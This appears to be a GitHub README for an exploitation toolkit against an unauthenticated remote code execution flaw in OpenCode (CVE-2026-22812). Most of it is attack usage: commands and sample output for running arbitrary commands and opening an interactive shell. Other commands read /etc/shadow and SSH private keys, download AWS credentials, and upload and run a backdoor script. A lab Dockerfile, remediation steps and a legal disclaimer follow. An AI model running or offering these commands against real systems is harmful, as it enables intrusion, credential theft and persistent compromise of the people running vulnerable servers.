# CVE-2026-22812 Exploit Tool

[![Python](https://img.shields.io/badge/python-3.7+-blue.svg)](https://www.python.org/downloads/)
[![CVSS](https://img.shields.io/badge/CVSS-8.8%20High-red.svg)](https://nvd.nist.gov/vuln/detail/CVE-2026-22812)

**Full-featured exploitation toolkit for CVE-2026-22812 - OpenCode Unauthenticated RCE**


---

## 🎯 Overview

CVE-2026-22812 Exploit Tool is a comprehensive exploitation framework for the OpenCode unauthenticated remote code execution vulnerability. This tool provides multiple exploitation methods including interactive shell, file operations, and system enumeration.

### Vulnerability Details

- **CVE ID**: CVE-2026-22812
- **Affected**: OpenCode < 1.0.216
- **CVSS Score**: 8.8 (High)
- **Attack Vector**: Network
- **Authentication**: None Required
- **Impact**: Complete system compromise

---

## ✨ Features

### 🔓 Exploitation Capabilities

- ✅ **Unauthenticated Session Creation**
- ✅ **Arbitrary Command Execution** (RCE)
- ✅ **Interactive Shell** with command history
- ✅ **File Upload/Download**
- ✅ **Arbitrary File Read**
- ✅ **PTY Session Creation**
- ✅ **System Enumeration**
- ✅ **Proxy Support** (Burp Suite compatible)

---

## 📦 Installation

### Prerequisites

- Python 3.7+
- pip
- requests library

### Quick Install

```bash
# Clone repository
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Install dependencies
pip3 install -r requirements.txt
```

### Manual Install

```bash
pip3 install requests urllib3
```

---

## 🚀 Usage

### Basic Exploitation

#### 1. Verify Target is Vulnerable

```bash
python3 exploit.py -t http://192.168.1.10:4096 --verify
```

**Output:**
```
[+] Target is VULNERABLE to CVE-2026-22812!
[+] Session ID: abc123def456
```

#### 2. Execute Single Command

```bash
python3 exploit.py -t http://192.168.1.10:4096 -c "id"
```

**Output:**
```
[*] Creating session...
[+] Session created: abc123def456
[+] Target is VULNERABLE!

[*] Executing: id
[+] Command executed successfully

uid=1000(developer) gid=1000(developer) groups=1000(developer)
```

#### 3. Interactive Shell Mode

```bash
python3 exploit.py -t http://192.168.1.10:4096 -i
```

**Interactive Session:**
```
[+] Session created: abc123def456
[+] Target is VULNERABLE!

[*] Entering interactive shell mode
[!] Type 'help' for commands, 'exit' to quit

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Reading file: /etc/hostname
[+] File read successfully (10 bytes)
dev-server-01

developer@target$ exit
[*] Exiting...
```

---

## 📚 Detailed Usage

### Command Execution

```bash
# Single command
python3 exploit.py -t http://target:4096 -c "whoami"

# Complex command
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Multiple commands
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"
```

### File Operations

#### Read Files

```bash
# Read sensitive files
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa
```

#### Upload Files

```bash
# Upload shell script
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Upload binary
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Upload with execution
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"
```

#### Download Files

```bash
# Download configuration
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Download credentials
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Download source code
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json
```

### System Enumeration

```bash
# Gather system information
python3 exploit.py -t http://target:4096 --sysinfo
```

**Output:**
```json
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}
```

---

### Remediation

1. **Update immediately**: `npm install -g opencode-ai@latest`
2. **Kill processes**: `pkill -f opencode`
3. **Check logs**: Review system logs for compromise indicators
4. **Rotate credentials**: Change passwords, SSH keys
5. **Audit systems**: Check for backdoors

---

## 🧪 Testing Lab Setup

### Using Docker (Recommended)

```dockerfile
# Dockerfile for vulnerable OpenCode
FROM node:18
RUN npm install -g opencode-ai@1.0.215
EXPOSE 4096
CMD ["opencode"]
```

```bash
# Build and run
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Test exploit
python3 exploit.py -t http://localhost:4096 -i
```

### Manual Setup

```bash
# Install vulnerable version
npm install -g opencode-ai@1.0.215

# Start OpenCode
opencode

# In another terminal, run exploit
python3 exploit.py -t http://localhost:4096 --verify
```

⚠️ **Never deploy vulnerable versions in production!**

---

## 📚 References

### Vulnerability Information

- **NVD**: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
- **GitHub Advisory**: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
- **MITRE**: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

---

## ⚠️ Legal Disclaimer

**READ CAREFULLY**

This tool is provided for **AUTHORIZED SECURITY TESTING ONLY**.

### ❌ Prohibited Use

- Unauthorized system access
- Scanning without permission
- Any illegal activities
- Malicious purposes
- Production systems without authorization

### Legal Notice

**The authors:**
- DO NOT condone illegal use
- ARE NOT responsible for misuse
- WILL NOT support illegal activities
- ASSUME NO LIABILITY

**By using this tool, you agree to:**
- Obtain proper authorization
- Comply with all laws
- Accept full responsibility
- Use ethically and responsibly

**USE AT YOUR OWN RISK**

---

<p align="center">
  <b>⭐ Star if useful! ⭐</b><br>
  <sub>For authorized security testing only</sub>
</p>
